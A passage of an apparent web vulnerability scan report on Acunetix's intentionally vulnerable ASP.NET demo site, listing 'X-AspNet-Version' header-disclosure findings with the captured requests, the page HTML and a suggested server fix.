          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        26. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Content-Length: 6567
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6567 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 22784
          
          
          Response body (22784 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        27. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (456 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Content-Length: 10985
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10985 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30486
          
          
          Response body (30486 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and 